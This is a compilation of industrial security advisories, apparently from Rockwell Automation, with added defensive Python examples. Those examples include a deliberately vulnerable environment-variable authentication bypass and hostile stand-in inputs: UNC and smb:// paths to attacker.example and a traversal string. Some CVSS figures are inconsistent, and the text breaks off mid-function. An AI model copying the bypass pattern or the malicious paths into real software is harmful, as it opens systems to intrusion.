  • Known Exploited Vulnerability (KEV) database: an official list of security flaws that attackers have actively exploited
  • CIP Communication: Common Industrial Protocol (CIP) is a common communication standard that is widely used in industrial automation. It comprises a series of protocols for communication between different devices and systems in automation technology.
  • Denial-of-Service (DoS): An attack that disrupts the normal functioning of a system, often by overwhelming it with requests.
  • Web Server: A software and hardware system that serves content over the internet using the Hypertext Transfer Protocol (HTTP) or its secure version, HTTPS. Its primary role is to store, process, and deliver webpages to users' browsers upon request.



High
SD1750 | Lifecycle Services Vulnerable to Cisco CVE-2025-20352
Published Date: October 02, 2025
Last Updated: October 02, 2025
CVE IDs: CVE-2025-20352
CVSS Scores (v3.1): 7.7
CVSS Scores (v4.0): 6.3
Revision Number: 1.0
Known Exploited Vulnerability (KEV): Yes
Corrected: Yes
Workaround: Yes

Lifecycle Services Vulnerable to Cisco CVE-2025-20352

Affected products and solution

Affected Product: Industrial Data Center (IDC) with Cisco Switching
Affected Software Version: Generations 1 – 5
Corrected in Software Version: Use Cisco version checker to determine fixed version to download

Affected Product: IDC-Managed Support contract with Cisco Switching
Affected Software Version: Generations 1 – 5
Corrected in Software Version: Use Cisco version checker to determine fixed version to download

Affected Product: Network-Managed Support contract with Cisco network switch
Affected Software Version: All
Corrected in Software Version: Use Cisco version checker to determine fixed version to download

Affected Product: Firewall-Managed Support contract with Cisco firewall
Affected Software Version: All
Corrected in Software Version: Use Cisco version checker to determine fixed version to download

Security Issue Details

CVE ID: CVE-2025-20352
Impact: A third-party vulnerability exists in the affected products. The affected products use Cisco IOS XE Software which contains a vulnerability in the Simple Network Management Protocol (SNMP) subsystem. An authenticated, remote attacker with low privileges could cause a denial of service (DoS) condition on an affected device that is running Cisco IOS Software or Cisco IOS XE Software. To cause the DoS, the attacker must have the SNMPv2c or earlier read-only community string or valid SNMPv3 user credentials. An authenticated, remote attacker with high privileges could execute code as the root user on an affected device that is running Cisco IOS XE Software. To execute code as the root user, the attacker must have the SNMPv1 or v2c read-only community string or valid SNMPv3 user credentials and administrative or privilege 15 credentials on the affected device. An attacker could exploit this vulnerability by sending a crafted SNMP packet to an affected device over IPv4 or IPv6 networks. This vulnerability is due to a stack overflow condition in the SNMP subsystem of the affected software. A successful exploit could allow a low-privileged attacker to cause the affected system to reload, resulting in a DoS condition, or allow a high-privileged attacker to execute arbitrary code as the root user and obtain full control of the affected system. Note: This vulnerability affects all versions of SNMP.
CVSS 3.1 Base Score: 7.7/10
CVSS 4.0 Base Score: 6.3/10
CWEs: CWE-121: Stack-based Buffer Overflow
Known Exploited Vulnerability: Yes (Listed in KEV Database)

Mitigations and Workarounds

Users with an active Rockwell Automation Infrastructure Managed Service contract: Contact Rockwell Automation to discuss actions needed for remediation efforts.

Users without a Rockwell Automation managed services contract should refer to Cisco’s workarounds below:

  • Cisco’s Workarounds

Additionally, users using the affected software, who are not able to upgrade to one of the corrected versions, are encouraged to apply security best practices, where possible.

  • Security Best Practices

Revision History

Revision: 1.0
Date: 10/2/2025
Description: Initial release


Glossary

  • Simple Network Management Protocol (SNMP): Used for collecting and organizing information about managed devices on IP networks.
  • Stack overflow: A runtime error that occurs when a program uses more stack memory than is available, typically due to excessive or infinite recursion or deeply nested function calls.
  • Denial of Service (DoS): A malicious attempt to disrupt the normal functioning of a targeted server, service, or network by overwhelming it with a flood of traffic or triggering a crash.
  • Cisco IOS (Internetwork Operating System): Proprietary software used on most Cisco routers and switches, providing the command-line interface and network services necessary for configuring, managing, and operating Cisco networking devices.
  • Cisco IOS XE: A modern, modular operating system built on a Linux kernel that powers Cisco enterprise networking devices, offering enhanced programmability, security, and scalability while maintaining compatibility with traditional IOS command-line interfaces.



High
SD1749 | Stratix® Impact to Cisco CVE-2025-20352
Published Date: September 26, 2025
Last Updated: September 26, 2025
CVE IDs: CVE-2025-20352
Products: Stratix
CVSS Scores (v3.1): 7.7
CVSS Scores (v4.0): 6.3
Known Exploited Vulnerability (KEV): No
Corrected: Yes
Workaround: No

Product Description

Rockwell Automation Stratix® devices are industrial Ethernet switches and network infrastructure components designed for rugged environments, offering managed and unmanaged options with integrated support for EtherNet/IP™ and optimized configuration through Studio 5000®.

Affected products and solution

Affected Product: Stratix® 5700, Stratix® 5400, Stratix® 5410
CVE: CVE-2025-20352
Affected Software Version: Up to v15.2(8)E7
Corrected in Software Version: Expected October 2025

Affected Product: Stratix® 5200/5800
CVE: CVE-2025-20352
Affected Software Version: Up to v17.17.01
Corrected in Software Version: Expected March 2026

Security Issue Details

CVE ID: CVE-2025-20352
Impact: A third-party vulnerability exists in the affected products. The affected products use Cisco IOS XE Software which contains a vulnerability in the Simple Network Management Protocol (SNMP) subsystem. An authenticated, remote attacker with low privileges could cause a denial of service (DoS) condition on an affected device that is running Cisco IOS Software or Cisco IOS XE Software. To cause the DoS, the attacker must have the SNMPv2c or earlier read-only community string or valid SNMPv3 user credentials. An authenticated, remote attacker with high privileges could execute code as the root user on an affected device that is running Cisco IOS XE Software. To execute code as the root user, the attacker must have the SNMPv1 or v2c read-only community string or valid SNMPv3 user credentials and administrative or privilege 15 credentials on the affected device. An attacker could exploit this vulnerability by sending a crafted SNMP packet to an affected device over IPv4 or IPv6 networks. This vulnerability is due to a stack overflow condition in the SNMP subsystem of the affected software. A successful exploit could allow a low-privileged attacker to cause the affected system to reload, resulting in a DoS condition, or allow a high-privileged attacker to execute arbitrary code as the root user and obtain full control of the affected system. Note: This vulnerability affects all versions of SNMP.
CVSS 3.1 Base Score: 7.7/10
CVSS 4.0 Base Score: 6.3/10
CWEs: CWE-121: Stack-based Buffer Overflow
Known Exploited Vulnerability: No (Not listed in KEV database)

Mitigations and Workarounds

Customers using the affected Stratix® software should see the workarounds section from Cisco and our security best practices.

Revision History

Revision: 1.0
Date: 9/26/2025
Description: Initial release


Glossary

  • Simple Network Management Protocol (SNMP): Used for collecting and organizing information about managed devices on IP networks.
  • Stack overflow: A runtime error that occurs when a program uses more stack memory than is available, typically due to excessive or infinite recursion or deeply nested function calls.
  • Denial of Service (DoS): A malicious attempt to disrupt the normal functioning of a targeted server, service, or network by overwhelming it with a flood of traffic or triggering a crash.
  • Cisco IOS (Internetwork Operating System): Proprietary software used on most Cisco routers and switches, providing the command-line interface and network services necessary for configuring, managing, and operating Cisco networking devices.
  • Cisco IOS XE: A modern, modular operating system built on a Linux kernel that powers Cisco enterprise networking devices, offering enhanced programmability, security, and scalability while maintaining compatibility with traditional IOS command-line interfaces.


High
SD1748 | FactoryTalk® Analytics™ LogixAI® Exposed Redis DB
Published Date: September 09, 2025
Last Updated: September 09, 2025
CVE IDs: CVE-2025-9364
Products: FactoryTalk® Analytics™ LogixAI®
CVSS Scores (v3.1): 8.8
CVSS Scores (v4.0): 8.7
Known Exploited Vulnerability (KEV): No
Corrected: Yes
Workaround: No

The security of our products is important to us as your industrial automation supplier. This security issue was found internally during routine testing and is being reported based on our commitment to customer transparency and improvement of all business environments.

Product Description

FactoryTalk® Analytics™ LogixAI® from Rockwell Automation is an embedded machine learning solution that enables control engineers to deploy predictive models directly within Logix controllers.

Affected products and solution

Affected Product: FactoryTalk® Analytics™ LogixAI®
CVE: CVE-2025-9364
Affected Software Version: Versions 3.00 and 3.01
Corrected in Software Version: Version 3.02 and later

Security Issue Details

CVE ID: CVE-2025-9364
Impact: An open database issue exists in the affected product and version. The security issue stems from an over-permissive Redis instance. This could result in an attacker on the intranet accessing sensitive data and potentially altering data.
CVSS 3.1 Base Score: 8.8/10
CVSS 4.0 Base Score: 8.7/10
CWEs: CWE-497: Exposure of Sensitive System Information to an Unauthorized Control Sphere
Known Exploited Vulnerability: No (Not listed in KEV database)

Mitigations and Workarounds

Customers using the affected software, who are not able to upgrade to one of the corrected versions, should use our security best practices.

Revision History

Revision: 1.0
Date: September 9, 2025
Description: Initial release


Glossary

  • Known Exploited Vulnerability (KEV) database: an official list of security flaws that attackers have actively exploited
  • Redis Database: An open-source, in-memory data structure store used as a database, cache, and message broker. It supports various data types like strings, hashes, lists, sets, and more, and is known for its high performance, low latency, and simplicity.



High
SD1747 | ControlLogix® 5580 V35.013 Denial-Of-Service
Published Date: September 09, 2025
Last Updated: September 09, 2025
CVE IDs: CVE-2025-9166
Products: ControlLogix® 5580
CVSS Scores (v3.1): 7.5
CVSS Scores (v4.0): 8.2
Known Exploited Vulnerability (KEV): No
Corrected: Yes
Workaround: No

The security of our products is important to us as your industrial automation supplier. This security issue was found internally during routine testing and is being reported based on our commitment to customer transparency and improvement of all business environments.

Product Description

The ControlLogix® 5580 controller from Rockwell Automation delivers high-speed, multi-discipline control for discrete, motion, process, and safety applications, featuring enhanced security and integrated motion over EtherNet/IP.

Affected products and solution

Affected Product: ControlLogix® 5580
CVE: CVE-2025-9166
Affected Software Version: Version 35.013
Corrected in Software Version: Version 35.014 and later
Affected Catalog Numbers: Bulletin 1756

Security Issue Details

CVE ID: CVE-2025-9166
Impact: A denial-of-service security issue exists in the affected product and version. The security issue stems from the controller repeatedly attempting to forward messages. The issue could result in a major nonrecoverable fault on the controller.
CVSS 3.1 Base Score: 7.5/10
CVSS 4.0 Base Score: 8.2/10
CWEs: CWE-476: NULL Pointer Dereference
Known Exploited Vulnerability: No (Not listed in KEV database)

Mitigations and Workarounds

Customers using the affected software, who are not able to upgrade to one of the corrected versions, should use our security best practices.

Revision History

Revision: 1.0
Date: September 9, 2025
Description: Initial release


Glossary

  • Known Exploited Vulnerability (KEV) database: an official list of security flaws that attackers have actively exploited
  • Denial-of-Service (DoS): An attack that disrupts the normal functioning of a system, often by overwhelming it with requests.
  • Major Nonrecoverable Fault (MNRF): an error that occurs in a system or device and prevents it from recovering or functioning properly



High
SD1746 | CompactLogix® 5480 Code Execution Vulnerability
Published Date: September 09, 2025
Last Updated: September 09, 2025
CVE IDs: CVE-2025-9160
Products: CompactLogix® 5480
CVSS Scores (v3.1): 6.8
CVSS Scores (v4.0): 7.0
Known Exploited Vulnerability (KEV): No
Corrected: No
Workaround: Yes

The security of our products is important to us as your industrial automation supplier. This security issue was found internally during routine testing and is being reported based on our commitment to customer transparency and improvement of all business environments.

Product Description

The CompactLogix® 5480 controller from Rockwell Automation is a high-performance, real-time controller that combines Logix control with Windows 10 IoT Enterprise.

Affected products and solution

Affected Product: CompactLogix® 5480
CVE: CVE-2025-9160
Affected Software Version: Version 32 - 37.011 with Windows package (2.1.0), Win10 v1607
Corrected in Software Version: N/A
Affected Catalog Numbers: 5069-L430ERMW, 5069-L450ERMW, 5069-4100ERMW, 5069-L4200ERMW, 5069-L46ERMW

Security Issue Details

CVE ID: CVE-2025-9160
Impact: A code execution security issue exists in the affected product. An attacker with physical access could abuse the maintenance menu of the controller with a crafted payload. The security issue can result in arbitrary code execution.
CVSS 3.1 Base Score: 6.8/10
CVSS 4.0 Base Score: 7.0/10
CWEs: CWE-306: Missing Authentication for Critical Function
Known Exploited Vulnerability: No (Not listed in KEV database)

Mitigations and Workarounds

Best security practices should be applied.

  • Security Best Practices
  • System Security Design Guidelines

Revision History

Revision: 1.0
Date: September 9, 2025
Description: Initial release


Glossary

  • Known Exploited Vulnerability (KEV) database: an official list of security flaws that attackers have actively exploited
  • Arbitrary Code Execution: an attacker's ability to run any commands or code of the attacker's choice on a target machine or in a target process



High
SD1745 | Stratix IOS CSRF to RCE Vulnerability
Published Date: September 09, 2025
Last Updated: September 05, 2025
CVE IDs: CVE-2025-7350
Products: Stratix IOS
CVSS Scores (v3.1): 9.6
CVSS Scores (v4.0): 8.6
Known Exploited Vulnerability (KEV): No
Corrected: Yes
Workaround: No

Stratix® IOS Cross-Site Request Forgery to Code Execution Vulnerability  

 

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

 

Product Description

 

Stratix® industrial Ethernet switches from Rockwell Automation provide high-performance network infrastructure optimized for industrial environments.

 

Affected products and solution

 

Affected Product 

CVE 

Affected  Software Version 

Corrected in Software Version 

Affected Catalog Numbers

Stratix IOS 

CVE-2025-7350

15.2(8)E5 and below

 

15.2(8)E6

 

1783-BMS*

1783-ZMS*

1783-IMS*

1783-HMS*

1783-MS06T

1783-MS10T

 

 

Security Issue Details

Category | Details
CVE ID | CVE-2025-7350
Impact | A security issue affecting multiple Cisco IOS devices also directly affects Stratix® 5410, 5700 and 8000 switches. Through cross-site request forgery against the switch's web interface, an attacker can upload and run a malicious configuration without authenticating, leading to remote code execution.
CVSS 3.1 Base Score | 9.6/10
CVSS 4.0 Base Score | 8.6/10
CWEs | CWE-74: Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')
Known Exploited Vulnerability | No (not listed in the CISA KEV catalog)

Mitigations and Workarounds

Customers running the affected software who cannot upgrade to the corrected version should apply our security best practices.
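The advisory offers no workaround, so the first practical step is finding which switches are still below 15.2(8)E6. The following is an added example (not Rockwell's or Cisco's code) that parses the version token out of `show version` output and compares it with the corrected release. The version-ordering rule, the hostnames and the sample `show version` lines are all constructed for this example.

```python
import re
from typing import Dict, Optional, Tuple

# Release in which the advisory says CVE-2025-7350 is corrected.
FIXED_VERSION = "15.2(8)E6"

# IOS 15.x version tokens look like 15.2(8)E5 or 15.2(7)E10a:
# major.minor(maintenance)TRAIN rebuild [lowercase suffix]
_VERSION_RE = re.compile(
    r"^(?P<major>\d+)\.(?P<minor>\d+)\((?P<maint>\d+)\)"
    r"(?P<train>[A-Z]+)?(?P<rebuild>\d+)?(?P<suffix>[a-z]*)$"
)
_SHOW_VERSION_RE = re.compile(r"Version\s+(\d+\.\d+\(\d+\)[A-Za-z0-9]*)")


def parse_ios_version(token: str) -> Tuple[int, int, int, str, int, str]:
    """Turn a version token into a comparable tuple.

    Ordering assumption (this example's, not the advisory's): versions sort
    as (major, minor, maintenance, train, rebuild, suffix), so
    15.2(7)E10 < 15.2(8)E5 < 15.2(8)E5a < 15.2(8)E6.
    """
    m = _VERSION_RE.match(token.strip())
    if not m:
        raise ValueError(f"unrecognised IOS version token: {token!r}")
    return (int(m["major"]), int(m["minor"]), int(m["maint"]),
            m["train"] or "", int(m["rebuild"] or 0), m["suffix"] or "")


def is_affected(token: str, fixed: str = FIXED_VERSION) -> bool:
    """True when the running version is below the corrected release."""
    return parse_ios_version(token) < parse_ios_version(fixed)


def version_from_show_version(output: str) -> Optional[str]:
    """Pull the version token out of `show version` output."""
    m = _SHOW_VERSION_RE.search(output)
    return m.group(1) if m else None


def triage(inventory: Dict[str, str]) -> Dict[str, Optional[bool]]:
    """hostname -> True (affected), False (corrected) or None (no version found)."""
    result: Dict[str, Optional[bool]] = {}
    for host, output in inventory.items():
        token = version_from_show_version(output)
        result[host] = None if token is None else is_affected(token)
    return result


# Constructed sample output; not captured from real switches.
SAMPLE_INVENTORY = {
    "cell1-stratix5700": "Cisco IOS Software, IE2000 Software (IE2000-UNIVERSALK9-M), Version 15.2(8)E5, RELEASE SOFTWARE (fc1)",
    "cell2-stratix5410": "Cisco IOS Software, IE5000 Software (IE5000-UNIVERSALK9-M), Version 15.2(8)E6, RELEASE SOFTWARE (fc2)",
    "cell3-stratix8000": "Cisco IOS Software, IE3000 Software (IES-LANBASEK9-M), Version 15.2(7)E4, RELEASE SOFTWARE (fc1)",
}

if __name__ == "__main__":
    for host, affected in triage(SAMPLE_INVENTORY).items():
        state = {True: "AFFECTED", False: "corrected", None: "unknown"}[affected]
        print(f"{host}: {state}")
```

Feed `triage()` a dict built from your own collected `show version` output; a `None` result means the version token was not found and the device needs a manual look rather than being assumed safe.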

 

Revision History

Revision | Date | Description
1.0 | September 9, 2025 | Initial release

 

 

 

Glossary 

 

·         Known Exploited Vulnerability (KEV) database: an official list of security flaws that attackers have actively exploited

·         Remote Code Execution: allows attackers to run arbitrary code on a remote machine, connecting to it over public or private networks

 

 

 

Get Up-to-Date Product Security Information

 

Visit the Rockwell Automation security advisories on the Trust Center page to:

·         Subscribe to product security alerts

·         Review the current list of Rockwell Automation security advisories

·         Report a possible security issue in a Rockwell Automation product

·         Learn more about the Rockwell Automation vulnerability policy

 

 

Support


If you have any questions regarding the security issue(s) above and how to mitigate them, contact TechConnect for help. More information can be found at Contact Us | Rockwell Automation | US.

 

If you have any questions regarding this disclosure, please contact PSIRT

Email: rasecure@ra.rockwell.com

 


High
SD1744 | 1783-NATR Memory Size Calculation Underflow Vulnerability
Published Date:
September 09, 2025
Last Updated:
September 05, 2025
CVE IDs:
CVE-2020-28895
Products:
1783-NATR
CVSS Scores (v3.1):
7.3
CVSS Scores (v4.0):
6.9
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No

1783-NATR Memory Size Calculation Underflow Vulnerability

 

The security of our products is important to us as your industrial automation supplier. This security issue was found internally during routine testing and is being disclosed in line with our commitment to customer transparency and to helping customers protect their business environments. Please note that Rockwell Automation could not confirm whether this vulnerability is exploitable; we are disclosing it in the interest of full transparency and proactive communication.

 

Product Description

 

1783-NATR is a configurable NAT router that simplifies machine integration into plant-wide networks by enabling 1:1 IP address translation, supporting Device Level Ring and linear topologies, and allowing configuration via web interface or Studio 5000 Add-on Profile.

 

Affected products and solution

Affected Product | CVE | Affected Software Version | Corrected in Software Version | Affected Catalog Numbers
1783-NATR | CVE-2020-28895 | All versions prior to 1.007 | 1.007 | 1783-NATR

 

Security Issue Details

Category | Details
CVE ID | CVE-2020-28895
Impact | In Wind River VxWorks, the memory allocator has a possible integer overflow when calculating the size of the memory block to be allocated by calloc(). As a result, the memory actually allocated is smaller than the buffer size the caller specified, leading to memory corruption.
CVSS 3.1 Base Score | 7.3/10
CVSS 4.0 Base Score | 6.9/10
CWEs | CWE-1103: Use of Platform-Dependent Third Party Components
Known Exploited Vulnerability | No (not listed in the CISA KEV catalog)

 

Glossary:

·        Wind River VxWorks: A trusted and widely deployed real-time operating system (RTOS) for mission-critical embedded systems. Used in all NATR modules.

 

Mitigations and Workarounds

Customers running the affected software who cannot upgrade to the corrected version should apply our security best practices.
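To make the bug class concrete, the following added example (not VxWorks code and not part of the advisory) models the calloc() size computation on a fixed-width target next to the overflow guard that prevents it, and shows what a caller that trusts the unchecked size does to the heap. The 32-bit word size is an assumption; the advisory does not state it.

```python
# Model of the calloc(nmemb, size) size computation on a fixed-width target.
# Assumption (not stated in the advisory): a 32-bit size_t, as on many
# VxWorks targets. WORD_BITS is a parameter so the same model covers 64-bit.
WORD_BITS = 32


def naive_calloc_bytes(nmemb: int, size: int, bits: int = WORD_BITS) -> int:
    """Unchecked computation: nmemb * size truncated to the machine word.
    When the product wraps, the allocator returns a block far smaller than
    the caller asked for. This is the bug class behind CVE-2020-28895."""
    return (nmemb * size) & ((1 << bits) - 1)


def checked_calloc_bytes(nmemb: int, size: int, bits: int = WORD_BITS):
    """Overflow-safe computation (the guard musl's calloc uses): refuse the
    request when nmemb * size cannot fit in a word."""
    size_max = (1 << bits) - 1
    if nmemb != 0 and size > size_max // nmemb:
        return None  # treat exactly like allocation failure (NULL / ENOMEM)
    return nmemb * size


def simulate_fill(nmemb: int, size: int, bits: int = WORD_BITS) -> str:
    """What happens when a caller trusts the unchecked size and then
    initialises every element: the writes run off the end of the block."""
    block = bytearray(naive_calloc_bytes(nmemb, size, bits))
    for offset in range(nmemb * size):
        if offset >= len(block):
            return (f"heap overflow: {nmemb * size} bytes written into a "
                    f"{len(block)}-byte block")
        block[offset] = 0x41
    return "ok"


if __name__ == "__main__":
    # 0x40000001 elements of 4 bytes is 0x100000004 bytes, which wraps to 4.
    print(naive_calloc_bytes(0x40000001, 4), checked_calloc_bytes(0x40000001, 4))
    print(simulate_fill(0x40000001, 4))
```

The practitioner's takeaway is the guard: any allocator or wrapper that multiplies a count by an element size must reject the request when the product does not fit in `size_t`, and callers must treat that rejection as a failed allocation rather than assuming the block exists.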

 

 

Revision History

Revision | Date | Description
1.0 | September 9, 2025 | Initial release

 

 

 

 


High
SD1743 | ThinManager SSRF Vulnerability
Published Date:
September 09, 2025
Last Updated:
September 05, 2025
CVE IDs:
CVE-2025-9065
Products:
ThinManager
CVSS Scores (v3.1):
7.2
CVSS Scores (v4.0):
8.6
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No

ThinManager® Server-Side Request Forgery Vulnerability

 

The security of our products is important to us as your industrial automation supplier. This security issue was found internally during routine testing and is being disclosed in line with our commitment to customer transparency and to helping customers protect their business environments.

 

Product Description

 

ThinManager is a centralized, secure thin client management software that delivers industrial visualization and application control across devices, helping optimize operations with scalable deployment and reduced IT overhead.

 

Affected products and solution

Affected Product | CVE | Affected Software Version | Corrected in Software Version | Affected Catalog Numbers
ThinManager® | CVE-2025-9065 | 13.0 - 14.0 | 14.1 | 9541*

 

Security Issue Details

Category | Details
CVE ID | CVE-2025-9065
Impact | A server-side request forgery issue exists in Rockwell Automation ThinManager® software due to a lack of input sanitization. An authenticated attacker can exploit it by specifying an external SMB path, causing the ThinServer® service to connect to the attacker's SMB server and authenticate to it, which exposes the ThinServer® service account's NTLM challenge-response hash for offline cracking or relay.
CVSS 3.1 Base Score | 7.2/10
CVSS 4.0 Base Score | 8.6/10
CWEs | CWE-918: Server-Side Request Forgery (SSRF)
Known Exploited Vulnerability | No (not listed in the CISA KEV catalog)

 

 

 

Glossary:

·         SMB: Server Message Block, a protocol used for sharing files, printers, and other resources over a network

·         NTLM: NT LAN Manager, a Windows challenge-response authentication protocol

 

 

Mitigations and Workarounds

Customers running the affected software who cannot upgrade to the corrected version should apply our security best practices. Customers can also refer to Microsoft's article on blocking NTLM connections on SMB in Windows Server 2025; blocking outbound NTLM on the SMB client stops the hash from being exposed, although it does not remove the underlying SSRF.

 

 

Revision History

Revision | Date | Description
1.0 | September 9, 2025 | Initial release

 

 

 

 


High
SD1741 | FactoryTalk Activation Manager Lack of Encryption Vulnerability
Published Date:
September 09, 2025
Last Updated:
September 04, 2025
CVE IDs:
CVE-2025-7970
Products:
FactoryTalk Activation Manager
CVSS Scores (v3.1):
7.1
CVSS Scores (v4.0):
8.7
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No

FactoryTalk Activation Manager Lack of Encryption Vulnerability

 

The security of our products is important to us as your industrial automation supplier. This security issue was found internally during routine testing and is being disclosed in line with our commitment to customer transparency and to helping customers protect their business environments.

 

Product Description

 

FactoryTalk Activation Manager is a secure software tool that enables activation and management of Rockwell Automation products without physical media, using internet-based activation files and multiple licensing options.

 

Affected products and solution

Affected Product | CVE | Affected Software Version | Corrected in Software Version
FactoryTalk Activation Manager | CVE-2025-7970 | 5.00 - 5.01 | 5.02

 

Security Issue Details

Category | Details
CVE ID | CVE-2025-7970
Impact | A security issue exists within FactoryTalk Activation Manager. An error in the software's implementation of cryptography could allow an attacker to decrypt traffic. This could result in data exposure, session hijacking or full compromise of the communication.
CVSS 3.1 Base Score | 7.5/10
CVSS 4.0 Base Score | 8.7/10
CWEs | CWE-303: Incorrect Implementation of Authentication Algorithm
Known Exploited Vulnerability | No (not listed in the CISA KEV catalog)

 

 

Mitigations and Workarounds

Customers running the affected software who cannot upgrade to the corrected version should apply our security best practices.

 

Revision History

Revision | Date | Description
1.0 | September 9, 2025 | Initial release

 

 

 

 


 

High
SD1742 | FactoryTalk Optix Remote Code Execution Vulnerability
Published Date:
September 09, 2025
Last Updated:
September 05, 2025
CVE IDs:
CVE-2025-9161
Products:
FactoryTalk Optix
CVSS Scores (v3.1):
7.1
CVSS Scores (v4.0):
7.3
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No

FactoryTalk Optix Remote Code Execution Vulnerability

 

The security of our products is important to us as your industrial automation supplier. This security issue was found internally during routine testing and is being disclosed in line with our commitment to customer transparency and to helping customers protect their business environments.

 

Product Description

 

FactoryTalk Optix is a scalable, cloud-enabled visualization platform that lets you design, test and deploy HMI applications across devices with modern templates, built-in collaboration tools and OPC UA-based interoperability.

 

Affected products and solution

Affected Product | CVE | Affected Software Version | Corrected in Software Version
FactoryTalk Optix | CVE-2025-9161 | All versions 1.5.0 - 1.5.7 | 1.6.0

 

Security Issue Details

Category | Details
CVE ID | CVE-2025-9161
Impact | A security issue exists within the FactoryTalk Optix MQTT broker due to a lack of URI sanitization. The flaw allows remote Mosquitto plugins to be loaded by the broker, which can be used to achieve remote code execution.
CVSS 3.1 Base Score | 7.1/10
CVSS 4.0 Base Score | 7.3/10
CWEs | CWE-20: Improper Input Validation
Known Exploited Vulnerability | No (not listed in the CISA KEV catalog)

 

 

Mitigations and Workarounds

Customers running the affected software who cannot upgrade to the corrected version should apply our security best practices.
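This advisory and SD1743 above (ThinManager, external SMB paths) come down to the same control: a path or URI supplied by a client must never be allowed to reference another host before it reaches a file API, an SMB client or a plugin loader. The following added example (not Rockwell's code and not part of either advisory) is one way to enforce that at the trust boundary. The root directory `C:\ProgramData\ExampleApp` is an assumption chosen for illustration.

```python
import ntpath
import re
from pathlib import PureWindowsPath
from typing import Optional
from urllib.parse import urlsplit

# Assumption (not from either advisory): the application keeps its files
# under one local root and must never follow a path or URI to another host.
ALLOWED_ROOT = PureWindowsPath(r"C:\ProgramData\ExampleApp")

_SCHEME_RE = re.compile(r"^[A-Za-z][A-Za-z0-9+.\-]*://")


def is_remote_reference(value: str) -> bool:
    """True for anything that would make the server contact another host:
    UNC paths (two leading slashes or backslashes, which also covers the
    Win32 UNC and device prefixes) and URLs such as smb://host/..., http://host/...
    or file://host/... A file:// URL with no host is treated as local."""
    v = value.strip()
    if v.replace("/", "\\").startswith("\\\\"):
        return True
    if _SCHEME_RE.match(v):
        parts = urlsplit(v)
        if parts.scheme.lower() != "file":
            return True
        return parts.netloc.lower() not in ("", "localhost")
    return False


def safe_local_path(value: str, root: PureWindowsPath = ALLOWED_ROOT) -> Optional[PureWindowsPath]:
    """Normalise `value` and return it only if it is a local path inside `root`;
    None otherwise. Call this before the value reaches any file API, SMB
    client or plugin loader."""
    if is_remote_reference(value):
        return None
    p = PureWindowsPath(value.strip())
    if p.drive.startswith("\\\\"):       # pathlib's own UNC detection, belt and braces
        return None
    if not p.is_absolute():
        p = root / p
    normalised = PureWindowsPath(ntpath.normpath(str(p)))  # collapse . and ..
    try:
        normalised.relative_to(root)
    except ValueError:
        return None                         # escaped the root or changed drive
    return normalised


if __name__ == "__main__":
    for candidate in (r"plugins\auth.dll",
                      r"\\attacker.example\share\evil.dll",
                      "smb://attacker.example/share/evil.dll",
                      r"plugins\..\..\..\Windows\System32\evil.dll"):
        print(f"{candidate!r:55} -> {safe_local_path(candidate)}")
```

The order matters: the remote-reference check runs on the raw string before any normalisation, because `//host/share` and `\\?\UNC\host\share` are both valid spellings of a UNC path on Windows and a naive "starts with a backslash" test misses the first.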

 

Revision History

Revision | Date | Description
1.0 | September 9, 2025 | Initial release

 

 

 

 


Critical
SD1735 | FactoryTalk® Linx Network Browser Security Bypass Vulnerability
Published Date:
August 14, 2025
Last Updated:
August 14, 2025
CVE IDs:
CVE-2025-7972
Products:
FactoryTalk Linx
CVSS Scores (v3.1):
9.0
CVSS Scores (v4.0):
8.4
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No

Published Date: 8/14/2025 
Last Updated: 8/14/2025 
Revision Number: 1.0 
CVSS Score: 9.0/10 

The security of our products is important to us as your chosen industrial automation supplier. This issue was found internally during routine testing and is being disclosed in line with our commitment to customer transparency and to helping customers protect their business and production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product | CVE | Affected Software Versions | Corrected in Software Version
FactoryTalk Linx | CVE-2025-7972 | All prior to 6.50 | 6.50 and later

 

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities. 

CVE-2025-7972 IMPACT

A security issue exists within the FactoryTalk Linx Network Browser. By setting process.env.NODE_ENV to 'development', a local attacker can disable FTSP token validation. This bypass allows the attacker to create, update and delete FTLinx drivers.

CVSS 3.1 Base Score: 9.0 
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:H

CVSS 4.0 Base Score: 8.4 
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:H/SA:H

CWE: CWE-286: Incorrect User Management
Known Exploited Vulnerability (KEV) database: No 

Mitigations and Workarounds 
Users should update to the corrected version if possible. Users of the affected software who cannot upgrade should apply security best practices.

  • Security Best Practices
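The pattern behind this finding is an authentication decision that consults a process environment variable. The following added example (not FactoryTalk Linx code; the token scheme is a hypothetical HMAC stand-in for FTSP token validation, which the advisory does not describe) shows the bypass beside its corrected form, with the environment passed in explicitly so both variants can be exercised.

```python
import hashlib
import hmac
import os
import secrets
from typing import Mapping

# Hypothetical stand-in for FTSP token validation (the real scheme is not
# described in the advisory): tokens are "<subject>.<HMAC-SHA256 hex>" under a
# server-side secret that only the FactoryTalk directory would hold.
SERVER_SECRET = secrets.token_bytes(32)


def issue_token(subject: str, secret: bytes = SERVER_SECRET) -> str:
    mac = hmac.new(secret, subject.encode(), hashlib.sha256).hexdigest()
    return f"{subject}.{mac}"


def token_is_valid(token: str, secret: bytes = SERVER_SECRET) -> bool:
    subject, sep, mac = token.rpartition(".")
    if not sep or not subject:
        return False
    expected = hmac.new(secret, subject.encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(mac, expected)   # constant-time comparison


def authorize_vulnerable(token: str, env: Mapping[str, str]) -> bool:
    """The bypass pattern: a debug switch read from the process environment
    short-circuits authentication. Whoever controls the environment the
    process starts with (a local user, hence AV:L in the vector above) is
    trusted without presenting a valid token."""
    if env.get("NODE_ENV") == "development":
        return True
    return token_is_valid(token)


def authorize_hardened(token: str, env: Mapping[str, str]) -> bool:
    """Authentication never consults the environment. NODE_ENV may still
    select logging verbosity or disable caching, but never whether a
    caller is trusted."""
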